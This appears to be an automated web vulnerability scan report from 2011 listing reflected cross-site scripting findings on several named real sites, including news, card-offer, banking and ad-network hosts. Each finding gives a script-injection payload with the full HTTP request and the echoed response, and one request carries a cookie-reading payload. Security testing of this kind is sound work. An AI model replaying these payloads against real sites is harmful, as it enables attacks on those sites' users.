HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:17:32 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN) Cache-Control: max-age=2820 Expires: Thu, 03 Feb 2011 17:04:32 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... uginsPage; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:15:25 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" /> ...[SNIP]...
1.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:15:05 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 78618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" /> ...[SNIP]...
1.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://offers.amexnetwork.com
Path:
/portalext/inline/back_support_mock_ie.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1 Host: offers.amexnetwork.com Proxy-Connection: keep-alive Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Surrogate-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Cache-Control: no-cache Expires: Thu, 03 Feb 2011 15:39:08 GMT Date: Thu, 03 Feb 2011 15:39:08 GMT Connection: close Content-Length: 125
<script> function getLocation() { return '457ed'-alert(1)-'43bbf2ba26d=1'; }
The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:22:55 GMT Date: Thu, 03 Feb 2011 14:22:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 215250
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:28:36 GMT Date: Thu, 03 Feb 2011 14:28:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:27:34 GMT Date: Thu, 03 Feb 2011 14:27:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 291329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:29:41 GMT Date: Thu, 03 Feb 2011 14:29:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... .do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923', { method:'GET', onComplete:parseXml }); } function parseXml(response) { var responseXml = response.responseXML; //alert(responseXml); var m ...[SNIP]...
The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinecheckingsbanking.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1 Host: peoplesbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE" Cache-Control: no-cache Content-type: text/html Connection: close Date: Thu, 03 Feb 2011 15:41:42 GMT Server: lighttpd Content-Length: 18861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="au ...[SNIP]... <span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span> ...[SNIP]...
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK Server: IM BidManager Date: Thu, 03 Feb 2011 19:02:42 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Thu, 03-Feb-2011 19:02:22 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Content-Length: 368
The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 920 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:22 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:22 GMT
The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 4368 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:26 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:25 GMT
The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 4388 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:29 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:28 GMT
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBC